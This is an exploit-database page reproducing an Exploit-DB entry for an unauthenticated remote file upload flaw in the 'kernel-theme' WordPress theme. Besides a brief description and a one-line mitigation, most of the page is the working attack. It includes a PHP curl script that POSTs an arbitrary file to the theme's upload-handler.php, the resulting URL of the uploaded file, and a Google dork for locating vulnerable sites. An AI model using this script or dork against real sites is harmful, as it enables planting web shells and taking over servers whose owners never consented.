header-logo
Suggest Exploit
vendor:
Kernel-theme
by:
iskorpitx
7,5
CVSS
HIGH
Remote File Upload Vulnerability
434
CWE
Product Name: Kernel-theme
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows/Linux
2013

WordPress themekernel-theme Themes Remote File Upload Vulnerability

A vulnerability in the WordPress themekernel-theme Themes allows an attacker to upload a malicious file to the server. The vulnerable file is upload-handler.php, which is located in the functions folder of the theme. An attacker can exploit this vulnerability by sending a POST request to the upload-handler.php file with a malicious file attached. The malicious file will be uploaded to the server and can be accessed via the URL http://127.0.0.1/wordpress/wp-content/uploads/2013/11/upload.php

Mitigation:

Ensure that the upload-handler.php file is not accessible to external users and that all uploaded files are scanned for malicious content.
Source

Exploit-DB raw data:

###################################################################################################
# Exploit Title: WordPress themekernel-theme Themes Remote File Upload Vulnerability
# Author: iskorpitx
# Date: 6/11/2013
# Vendor Homepage: http://www.wikmag.com/
# Themes Link: http://themeforest.net/item/kernel-premium-wordpress-blog-magazine-theme-/857077
# Infected File: upload-handler.php
# Category: webapps
# Google dork: inurl:/wp-content/themes/kernel-theme/
# Tested on : Windows/Linux
###################################################################################################

# Exploit


<?php 
$uploadfile="upload.php"; 
$ch = curl_init("http://127.0.0.1/wp-content/themes/kernel-theme/functions/upload-handler.php"); 
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('orange_themes'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
$postResult = curl_exec($ch); 
curl_close($ch); print "$postResult"; 
?>

http://127.0.0.1/wordpress/wp-content/uploads/2013/11/upload.php




All http://www.mavi1.org members

Navigation

Suggest Exploit

Services By CQR